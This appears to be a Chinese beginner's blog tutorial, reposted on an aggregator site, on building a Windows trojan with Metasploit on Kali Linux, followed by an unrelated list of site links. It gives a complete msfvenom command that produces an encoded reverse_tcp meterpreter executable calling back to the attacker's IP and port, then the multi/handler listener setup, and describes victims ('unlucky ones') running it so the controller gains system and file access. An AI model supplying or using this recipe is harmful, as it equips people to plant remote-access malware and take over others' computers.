kali->使用Metaspoit制作木马(无免杀)
来源:互联网 发布:linux centos 6.5 编辑:程序博客网 时间:2024/06/07 07:37
-**
本人是个新手,写写笔记。 如果那里有错误或者语言不妥的地方。
请给予斧正!万分感谢!
**
首先,我们要先知道木马的使用过程,然后我们才能制作出木马
- 木马:控制端(我们)
- 被控制端(倒霉蛋们)
- 虚拟机的kali
- 打开终端
- 使用msfvenom -p命令来制作(因为我用的是kali2.0所以和1.0的版本不一样)
- msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.1.108 LPORT=5555 -f exe > asd.exe
- 看不明白?不要慌!
- windows/meterpreter/reverse_tcp ->大体看出来这是windows下的tcp的一个漏洞(强大的Metaspoit自带多种漏洞,需要什么自行百度就ok)
- -e x86/shikata_ga_nai ->这是编码方式(我的windows7是64位的,所以要选择对应的编码格式。否则,生成可执行文件再打开时就会出现错误!)
- -i 5 ->编码次数
- -b ->就是避免出现的值
- -f exe ->生成.exe的可执行文件
- asd.exe > 文件名.exe
- LHOST ->这是填写自己本机的IP(因为这种木马是用反弹机制)
- LPORT ->填写自己的端口
-
- 回车运行!
-
- 我们可以看到,它生成一个434b的可执行文件
- 问题来了!生成的文件在哪里?
- 使用ls命令查看,生成在当前目录下
- 然后,将生成文件复制到windows下
-
- 第二步
- 配置接收木马上线的设置
- 打开Metaspoit
- msfconsole
-
- 我们就要开始输入命令了
- msf > use exploit/multi/handler
- 我们使用handler模块
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- 打开handler模块后,设置我们制作时用的木马漏洞
-
- 这里就显示设置成功
- 我们现在就要设置接收的IP和端口
- 输入命令
- msf exploit(handler) > show options
- 显示,我们需要填写什么设置
-
- 大家还记得我们制作木马时,填写的ip和端口吧
- 一定要对应
- msf exploit(handler) > set LHOST 192.168.1.108
- 使用set来依次设置
- msf exploit(handler) > set LPORT 5555
- 成功设置后
-
- 最后一步!
- 输入
- msf exploit(handler) > exploit
- 运行,等待木马上线
-
-
-
- 我们在windows下双击运行
-
- 木马上线成功!
- 接下来就可以进行系统操作和文件操作
- kali->使用Metaspoit制作木马(无免杀)
- 制作图片木马教程
- WAR木马制作
- 制作简单图片木马
- 制作Win&kali Linux双系统
- 制作 Kali 系统启动U盘
- 制作kali persistence U盘
- 会声会影旋转木马制作要点
- Dos命令制作一句话木马
- 一句话图片木马的制作
- kali-linux入门使用
- Kali 使用简介
- kali Linux使用蓝牙
- kali Linux使用蓝牙
- kali 下使用nmap
- kali使用github
- Kali Linux 使用教程
- Kali-linux使用OpenVAS
- 制作一个简单的扇叶
- 关于ContentProvider/ContentResolver组件操作SQLite详解
- Angular 路由配置详解
- 模拟String的增删查改
- Dropping Balls UVA
- kali->使用Metaspoit制作木马(无免杀)
- ImageNet 竞赛 2017 是最后一届,WebVision 竞赛或接棒
- C语言变量分类和应用以及五大内存空间
- linux下的文件操作命令
- 51nod 1070 Bash游戏 V4
- UVA 508 Morse Mismatches
- 招聘公告
- jQuery对象与DOM对象之间的转换方法
- padding 内边距